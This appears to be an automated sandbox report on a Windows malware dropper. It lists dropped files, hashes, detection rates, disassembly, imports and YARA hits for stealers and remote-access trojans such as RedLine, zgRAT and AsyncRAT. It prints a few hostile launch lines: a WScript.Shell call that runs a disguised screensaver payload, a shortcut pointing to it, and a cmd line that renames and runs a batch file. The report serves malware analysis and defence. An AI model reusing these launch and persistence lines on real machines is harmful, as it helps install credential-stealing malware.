                                                        SHA1:319CB80EED888D089AB5B6944ADBCBE89C3195EB
                                                        SHA-256:CEE5172F67CACBC90062C13713A08561B6984CB6C3C98663B7E541445B2FD492
                                                        SHA-512:8E7AEDBE38BEDF9A0C167F778EB7678B6AD73F56E1F1196EAF771C01B8D6CD2A99FF015190EFCF3F7E340979E501172D2D606E3E3B9AE53873AB9244AAF10EB9
                                                        Malicious:true
                                                        Preview:%.4m..z.,..9.).._......lV.....B1.bb.....2.AN...bb..L..6.!;..vHiJ..l.Nl..F|3_....p......s.S..-...A.e...Q.z...MPC..7.dpK..Xy...<...!L.... h...F......n(.......,fO..c....A3!...gL......].$....1.edn!..r.Uh~..?"....{. yN.....Av..Z@.......I..qN.....O5.L.[.q.N..s. .v...;..].B{.1.h...c...O.1.e.-].Y6=..\.9l U...$=.K.!.j.w..7..wt.@77.oLV.6..!...q./....xL .-._f...E..c..C~O.9...v.eH.......?...2k.(=H.....$j(...;Qb....j].T..P.h...j.}....^.D....3.'.*....in...3y...q.[!.A.f...}y..j%$a.p^Ss.Z....a..#.5>k..u...5..y........1..~..~..d..}L|.ci.sfT..i......G..i?.....w..L.zv>.....X...27...X....&L......gnK{[.kV.....W)...a.T..M.%.*.iC...y.A....3duJ.w+.H7....H.....6......a.s3.X..nV..a..q........a9.D.1j?....If.s^..s.]..8.....p.P.};....m....E'.g..k..M{...$..<.v6.&...&u....PH&dMT%.f..#B0v4.... ..B.s.~..u.E.BQ'..m.F5.....b..|..o0{c..V..W.S....R..R.B:.W.4.....%.Q..'.....U$..[.yhx..yF..|./..........v.j..g......ft.NA...-nV.r.=.g.E.!"J.A.bp...n.....1.:....K;...E..p...A.
                                                        Process:C:\Users\user\AppData\Local\Temp\1000142101\build2.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):492544
                                                        Entropy (8bit):6.391116117275591
                                                        Encrypted:false
                                                        SSDEEP:12288:UHdftnB3Zp+52J9+62HHLhJ3er8XSwW0:UNz3ZwwJ9+7HFnXP
                                                        MD5:F9A4F6684D1BF48406A42921AEBC1596
                                                        SHA1:C9186FF53DE4724EDE20C6485136B4B2072BB6A6
                                                        SHA-256:E0A051F93D4C1E81CC142181D14249E246BE4C169645D667267134B664E75042
                                                        SHA-512:67294A47DFEF6ABA404939497C403F93318841E9C5EE28B706F7506B5DFF2630381E28E86F6DCBFDFF2427092A515DB1DC0A04E334E7F8DE8B0B682269FF88FD
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 82%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+..J...J...J...<...J...<#..J...<...J...2...J...J...J...<...J...<'..J...< ..J..Rich.J..................PE..L.....jd.....................NA......K............@...........................F.....i"..........................................d.....D.H...........................p....................... 7.......6..@............................................text............................... ..`.data.....?......|..................@....rsrc...H.....D......n..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):187
                                                        Entropy (8bit):4.760030605070939
                                                        Encrypted:false
                                                        SSDEEP:3:RiMIpGXIdPHo55wWAX+aJp6/h4EkD5xXEZz+LAGQ+EBxXvfiZo5uWAX+aJp6/h4I:RiJBJHonwWDaJ0/hJkDvXEhapoRyywWh
                                                        MD5:B11FD7E16E222D604DFEEF154E83939A
                                                        SHA1:3F00113773E4EC6169C9A1F4965387F305158724
                                                        SHA-256:D7B7398F7E8E2D72636502D4AE48DF216A819242EADC6D10A812B55328FEB246
                                                        SHA-512:E33F8ABB207EC6372CB409C6EDB8868B060D58319E0EA7D4BA0AF28C73F3D8E39E9E9162708B01A14CB0B5BAE770598B5D3034B975D3E9BE7532A7B36C685E42
                                                        Malicious:true
                                                        Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\TrackGuard Technologies\\GuardTrack.scr\" \"C:\\Users\\user\\AppData\\Local\\TrackGuard Technologies\\z\"")
                                                        Process:C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):893608
                                                        Entropy (8bit):6.62028134425878
                                                        Encrypted:false
                                                        SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                        MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                        SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                        SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                        SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):792152
                                                        Entropy (8bit):7.999752041562741
                                                        Encrypted:true
                                                        SSDEEP:12288:S2txcY4Gu0kDVO9n0NZEncdRSu0QqcbI0pLZ3h3r6MorbtDTb85w491BIvgvW6E:f/Tu/4kuu0QqcbxZh3ribh05w4zwgvRE
                                                        MD5:6A22704AE494645CA19955DE0CB879BC
                                                        SHA1:ACC40B89422C32563656441519DF5D2199772398
                                                        SHA-256:F4E8BEB419142C0B8152CD8028B95A877B938A1F400C610DEE9E4139484385D6
                                                        SHA-512:3852D5E7D29BE2B89008C9A970D4770A5D4599D6F75B4927FB56CA12FDC7BA5DB0D2A6425786EC71A57A86342FCFC669E6CFB724683922FEB5175DD369A5D687
                                                        Malicious:true
                                                        Preview:K..J...vz..I`..i....D..t.....k7...W.9..r.a.z.\......_..........v.w.Y........'|.....$..*.!}.E..er.I.F.#5UA...B7S!u\../R.iU@.TsF.....WJ_6.Kd.f.B}.)t.K*qBG0..?.....?&9;...%..o.x..*.v.P.&+n.5j..^..D.-..%@.w.}..}..?..q.../.>G.S..~..a..U.O...yJ..b..E.%X...../P).....UN".,&..j..%4....o.........zZ.......y,..? ..+.!5S......Q. ..n;........Zw..l...`..r'?..|.'..Y.J...k..B.zW..no..Rk."....|.!..N..X h....Gn...A...FRA.\M..@... 1d....N.G.....EPq......i...yX..-&=.........m......G......U.......Qp...WC .0...L..h.q.....k.{.R.....l.*_oLL..p[....QL5..}.%K.F....K...#$Q,..n.=..\b.3.u:#p..g.ju...,~-'.n..F=...N.%....@/...K.L..r..]S./;.....oQ..a.......-s.`.gB..A....R.SJ...bO<..&|_..VZ...d(>.2..P.f. <z....H$...Nd(....!\...R.f...[#..Z{e..@j...G.c1...]MX..?..I.:...@.3I&......E..k.5.....E.t;....0.O..\/.L-c....R..|...jE!....z,.....kM..m.8.!.......j......iS.q.<...CB;].wY2...4Q3.2.-....]:ih....'..c..V..ht.... >?I. .J...C].l...8F..r{S.'..N).P.s.>.......b....Y.6G.P#........
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):557056
                                                        Entropy (8bit):6.311657384729558
                                                        Encrypted:false
                                                        SSDEEP:6144:q9DfA3bgFn8PGgNryMVOa/agTyqYYlHg8q16ODfL5DAq6syp2cbYJNLhTx:q9DfW68ugNus+qgZ1zLlDly2b
                                                        MD5:88367533C12315805C059E688E7CDFE9
                                                        SHA1:64A107ADCBAC381C10BD9C5271C2087B7AA369EC
                                                        SHA-256:C6FC5C06AD442526A787989BAE6CE0D32A2B15A12A41F78BACA336B6560997A9
                                                        SHA-512:7A8C3D767D19395CE9FFEF964B0347A148E517982AFCF2FC5E45B4C524FD44EC20857F6BE722F57FF57722B952EF7B88F6249339551949B9E89CF60260F0A714
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe, Author: Joe Security
                                                        • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe, Author: ditekSHen
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 88%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A/................0..,...R......^J... ...`....@.. ....................................@..................................J..K....`...O........................................................................... ............... ..H............text...d*... ...,.................. ..`.rsrc....O...`...P..................@..@.reloc...............~..............@..B................@J......H.......|Z...x......<...X....)...........................................*...(....*..0...........s........~....%:....&~......!...s....%.....(...+o.....8[....o...............%..F~s...(.....%..G~s...(.....%..H~s...(.....%..e~s...(.....~t...(.......o......8......(......s.......sK.......~....}....~...........s....(....o....}......{.....I~s...(....o........9......I~s...(.......8C........~s...(....o....:......{....~u...(....8......{....~v...(.........(...........9........o........(
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):2251
                                                        Entropy (8bit):7.618850218567111
                                                        Encrypted:false
                                                        SSDEEP:48:S7SjQDUrvaJno0Pr1DKewkbiW0EAHjUCkME99:ASUD8vaJZr1DgPW9SUCk99
                                                        MD5:5E0A8E102B0EF2FD67F8E0E083F4B99F
                                                        SHA1:21A9D9B85940D3EBEFA15FB849760B6C2BD4D7B9
                                                        SHA-256:FD893C28E95CE10DC41921E79977A75BC2600752C386C41291FAF29DE83613C1
                                                        SHA-512:199CF617BF41DEB001B2EB56B3429CE7DC0D09CDFFBCFA4D525262CA97CB2A50CA7A295AE55D8A631B9098E814147937905D93DDCF8841EF51619E596DB008B3
                                                        Malicious:false
                                                        Preview:........'...............P...............{41744BE4-11C5-494C-A213-BA0CE944938E}.....................RSA1..................v..XU~l2_.......vj....b.... ..&...X.Y...=q...).....`.1.0..~......5DL. ..S>.......<..y...*?YOA.... eb.QD..B..<.!..'J..+.'...4fu.z./....]@.y.b...o...).j'......0}B.*j..R..-..2.....'=...@....s....;. .v=..;...\$...G....2S....al.ZQ.Q...w...aXzW.....................z..O...........@..j...3.....,...C.r.y.p.t.o.A.P.I. .P.r.i.v.a.t.e. .K.e.y....f...... ....).W.[\..k......b..{......m.8............... .........r...6..r.r..U.:.N.Fc..H..P....W......J....X......rj^.S..n..")Px..bm.=.....I.n....[..X3.me....L.v<n...ys.....QljYf=...^...}.R....-.g...{.D3.2-.p=yE.+=.=.z1`/t.<..o.....V.W...a.P}./2-....b?..w6q.Wk.c...a...R.{$.....B.n~.(H....0>..4a...4......:R....CHO1...a..>...........`.t$....ZR....E..k=.(.5.(F.A!.<.....2.W.u.+rS7......p.{p..U.m.6S'..l..L..|wP]0./D.@.........a#.X..q-......dRLy.4.BSx.:p...+......C0s..W~.....v.&....|.s.;.H5da...,.".Y*.r{..
                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                        File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js" >), ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):99
                                                        Entropy (8bit):4.901237783596364
                                                        Encrypted:false
                                                        SSDEEP:3:HRAbABGQaFyw3pYoUkh4E2J5xXK+LAGQ+axXvGgc:HRYF5yjo923RKapaROgc
                                                        MD5:36E7AB4A35DC5D68061BACF9622A9C95
                                                        SHA1:D056707D6151F4CD93B20898789DEF672A706123
                                                        SHA-256:F113CB9545CAFF34A1D0D72A133778EF8216D23FF6AF40500C3963615195844C
                                                        SHA-512:8D77DD2F23A82882BF3CB06C97DF41F1ADB628164FFA8354DC3647E45CFAF18BF4D39143F61CBFCB68CC829D58B8A813AC1BB9D29217C0F48459E11A9957C408
                                                        Malicious:true
                                                        Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js" ..
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):311296
                                                        Entropy (8bit):5.082156492931411
                                                        Encrypted:false
                                                        SSDEEP:3072:sq6EgY6iChfrUjHcQZwP7h5kQgnKyyeTAXtUSiVlcZqf7D34leqiOLibBOe:nqY6iChawPfkx7yeTAdUblcZqf7DIvL
                                                        MD5:30F46F4476CDC27691C7FDAD1C255037
                                                        SHA1:B53415AF5D01F8500881C06867A49A5825172E36
                                                        SHA-256:3A8F5F6951DAD3BA415B23B35422D3C93F865146DA3CCF7849B75806E0B67CE0
                                                        SHA-512:271AADB524E94ED1019656868A133C9E490CC6F8E4608C8A41C29EFF7C12DE972895A01F171E8F625D07994FF3B723BB308D362266F96CB20DFF82689454C78F
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Roaming\WIDeqOfZq9.exe, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d.9...............0................. ... ....@.. ....................... ............@.................................t...O.... ..............................X................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):96256
                                                        Entropy (8bit):5.97238192300277
                                                        Encrypted:false
                                                        SSDEEP:1536:1z8H8uTSHKoKlDeE0C3shB1ueVby8EXEFA4Xib6TWcgMfAOISZsw61EmS:+c/q/l6EP3mvuwby8EXuhX6cgXOI0stE
                                                        MD5:DB5717FD494495EEA3C8F7D4AB29D6B0
                                                        SHA1:39BA82340121D9B08E9CF3D4BA6DFCB12EB6C559
                                                        SHA-256:6B59309AB12F1859A94FB2CE1C98639B2A538E6E098FFAC127E45C29733BD993
                                                        SHA-512:B16C7BFFC8418A0349E5189D61439DF325D2AB33A42C720380A305DECDE00348F83D96B6C263A95DC253128EB0E47B1A3DC96F8F115DA868FF9227B9A40882DE
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\Windows.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\Windows.exe, Author: Joe Security
                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\Windows.exe, Author: ditekSHen
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 84%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=.f.................n............... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...4m... ...n.................. ..`.rsrc................p..............@..@.reloc...............v..............@..B........................H........g..H%......&.....................................................(....*.r...p*. ....*..(....*.rC..p*.s.........s.........s.........s.........*.rg..p*. g.h.*.r...p*. r...*.r/..p*. ....*.r...p*. *p{.*.r...p*. ..?.*..((...*.r...p*. ...*.r...p*. S...*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*"(....+.*&(9...&+.*.+5sk... .... .'..ol...(,...~....-.(b...(T...~....om...&.-.*.ra..p*. ....*.r...p*. .y4.*.r)..p*. E/..*.r...p*.r...p*.rU..p*.r...p*. ..'.*.r...p*.
                                                        Process:C:\Users\user\AppData\Local\Temp\1000142101\build2.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):290
                                                        Entropy (8bit):3.392740206155609
                                                        Encrypted:false
                                                        SSDEEP:6:4xX55ZsUEZ+lX1uPycLXUetFXqYEp5t/uy0lFXmut0:4NuQ1uPPLnfXVpt0
                                                        MD5:2F9A97652DE149B7C7101AF7C6A72A39
                                                        SHA1:DF6EAF10A5A40CA434958658024F4E9025C17011
                                                        SHA-256:1224745D55801906FE2458D9B7BA60E43CEF04FC6F03A8DD8A4A7D981195E910
                                                        SHA-512:08FCF9A5E969E7344004C1AFAF8DC2B901D314A747CBCB440069D727E27FC1F489EEBB3D15BB771A9234C9860B0EB70D48EBBD0CEC49EAA707E88C747089781C
                                                        Malicious:false
                                                        Preview:....,v.....O.,..Su..F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.f.e.d.0.c.9.a.4.d.3.\.H.k.b.s.s.e...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0.................2.@3P.........................
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):7.906312664956289
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:wfJfUGeGT3.exe
                                                        File size:1'411'961 bytes
                                                        MD5:046ebd7e0f619f33de609ea3f126b0d3
                                                        SHA1:37a0b634955eb29f9bc7d3d434838cd729bb7e17
                                                        SHA256:bf554462c091219488a1a53fff22213df8d9530fa6ff0f59033b0c9ee9173555
                                                        SHA512:39afa534b862f9faebb4aa1ff4144a7d53f62adfd389531f75bdf10865fe8d846e79b3138ec90f2e9d4eb92a72e7a856f0c7be857a892a54eb2f2503f3030d10
                                                        SSDEEP:24576:39O/bmU++vQu1TL9yJ5d2m8y7i1HlcoGpJ042jJpUeBk2h:3k/X+75dAyMGDP2dpUYXh
                                                        TLSH:2D6523038B54E472FD2D09706D298A7846B77E2F4301D19BA2E87D793C77C958CDEA82
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......aKZe%*46%*46%*46,R.6&*46,R.64*46%*56.*46>..6+*46>..6$*46>..6$*46Rich%*46........PE..L.....GO.................p....>..B...8.....
                                                        Icon Hash:6062f2c8ccccfc04
                                                        Entrypoint:0x403899
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x4F47E2CF [Fri Feb 24 19:19:43 2012 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:5
                                                        OS Version Minor:0
                                                        File Version Major:5
                                                        File Version Minor:0
                                                        Subsystem Version Major:5
                                                        Subsystem Version Minor:0
                                                        Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                        Instruction
                                                        sub esp, 000002D4h
                                                        push ebx
                                                        push ebp
                                                        push esi
                                                        push edi
                                                        push 00000020h
                                                        xor ebp, ebp
                                                        pop esi
                                                        mov dword ptr [esp+18h], ebp
                                                        mov dword ptr [esp+10h], 00409268h
                                                        mov dword ptr [esp+14h], ebp
                                                        call dword ptr [00408030h]
                                                        push 00008001h
                                                        call dword ptr [004080B4h]
                                                        push ebp
                                                        call dword ptr [004082C0h]
                                                        push 00000008h
                                                        mov dword ptr [007F16D8h], eax
                                                        call 00007F98390C053Bh
                                                        push ebp
                                                        push 000002B4h
                                                        mov dword ptr [007F15F0h], eax
                                                        lea eax, dword ptr [esp+38h]
                                                        push eax
                                                        push ebp
                                                        push 00409264h
                                                        call dword ptr [00408184h]
                                                        push 0040924Ch
                                                        push 007E95E0h
                                                        call 00007F98390C021Dh
                                                        call dword ptr [004080B0h]
                                                        push eax
                                                        mov edi, 008420A0h
                                                        push edi
                                                        call 00007F98390C020Bh
                                                        push ebp
                                                        call dword ptr [00408134h]
                                                        cmp word ptr [008420A0h], 0022h
                                                        mov dword ptr [007F15F8h], eax
                                                        mov eax, edi
                                                        jne 00007F98390BDB0Ah
                                                        push 00000022h
                                                        pop esi
                                                        mov eax, 008420A2h
                                                        push esi
                                                        push eax
                                                        call 00007F98390BFEE1h
                                                        push eax
                                                        call dword ptr [00408260h]
                                                        mov esi, eax
                                                        mov dword ptr [esp+1Ch], esi
                                                        jmp 00007F98390BDB93h
                                                        push 00000020h
                                                        pop ebx
                                                        cmp ax, bx
                                                        jne 00007F98390BDB0Ah
                                                        add esi, 02h
                                                        cmp word ptr [esi], bx
                                                        Programming Language:
                                                        • [ C ] VS2008 SP1 build 30729
                                                        • [IMP] VS2008 SP1 build 30729
                                                        • [ C ] VS2010 SP1 build 40219
                                                        • [RES] VS2010 SP1 build 40219
                                                        • [LNK] VS2010 SP1 build 40219
                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x4730000x14f2a.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x3f90000x948.ndata
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x6f1c0x700064fef99d80ead9051b6e85267342c734False0.6666434151785714data6.524017251100935IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0xb0000x3e66dc0x200f8e9fc8c226177087968ccda63fbab7dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .ndata0x3f20000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0x4730000x14f2a0x15000c928ce6a41e0b0d551080b88e09341f7False0.5080101376488095data5.155059564909495IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x4880000x320e0x34004599932c653c719deb4325f61a884dbcFalse0.4661207932692308data4.729420728460667IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0x4731f00x11028Device independent bitmap graphic, 128 x 256 x 32, image size 69632EnglishUnited States0.4625244000459295
                                                        RT_ICON0x4842180x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.7256916192026037
                                                        RT_ICON0x4868800x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.7809653916211293
                                                        RT_DIALOG0x4879a80x100dataEnglishUnited States0.5234375
                                                        RT_DIALOG0x487aa80x11cdataEnglishUnited States0.6056338028169014
                                                        RT_DIALOG0x487bc40x60dataEnglishUnited States0.7291666666666666
                                                        RT_GROUP_ICON0x487c240x30dataEnglishUnited States0.8958333333333334
                                                        RT_MANIFEST0x487c540x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                                        DLLImport
                                                        KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                        USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                        GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                        SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                        ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                        COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                        ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                        VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States
                                                        Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:04:46:52
                                                        Start date:31/08/2024
                                                        Path:C:\Users\user\Desktop\wfJfUGeGT3.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\wfJfUGeGT3.exe"
                                                        Imagebase:0x400000
                                                        File size:1'411'961 bytes
                                                        MD5 hash:046EBD7E0F619F33DE609EA3F126B0D3
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:1
                                                        Start time:04:46:52
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exit
                                                        Imagebase:0x790000
